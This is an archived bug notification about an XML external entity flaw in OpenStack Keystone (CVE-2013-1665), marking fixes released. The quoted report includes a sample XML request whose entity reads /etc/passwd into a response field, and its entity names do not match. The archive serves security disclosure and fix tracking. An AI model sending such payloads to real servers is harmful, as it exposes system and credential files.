yahoo-eng-team team mailing list archive

Thread
Date

[Bug 1100279] Re: [OSSA 2013-004] Local file leak through entities in XML requests (CVE-2013-1665)

To: yahoo-eng-team@xxxxxxxxxxxxxxxxxxx
From: Morgan Fainberg <morgan.fainberg@xxxxxxxxx>
Date: Wed, 04 Jun 2014 23:32:05 -0000
Reply-to: Bug 1100279 <1100279@xxxxxxxxxxxxxxxxxx>
Sender: bounces@xxxxxxxxxxxxx

** Changed in: keystone/essex
       Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Keystone.
https://bugs.launchpad.net/bugs/1100279

Title:
  [OSSA 2013-004] Local file leak through entities in XML requests
  (CVE-2013-1665)

Status in OpenStack Identity (Keystone):
  Fix Released
Status in Keystone essex series:
  Fix Released
Status in Keystone folsom series:
  Fix Released
Status in OpenStack Security Advisories:
  Fix Released

Bug description:
  Evil XML ! Jonathan Murray from NCC Group reported that you can leak
  local file contents using XML entities in Keystone requests:

  POST /v2.0//OS-KSDM/roles HTTP/1.1
  x-auth-token: d0e1a2d3b4e5e6f7
  content-type: application/xml

  <!DOCTYPE doc [ <!ENTITY eny SYSTEM "file:///etc/passwd"> ]>
  <role>
  <name>&ent;</name>
  </role>

  just returns the content of the local file in role.name.

  Looks like we should disable parsing entities altogether, they seem to
  be exploitable ion pretty awesome ways. I'm not sure only Keystone is
  affected by this.

To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1100279/+subscriptions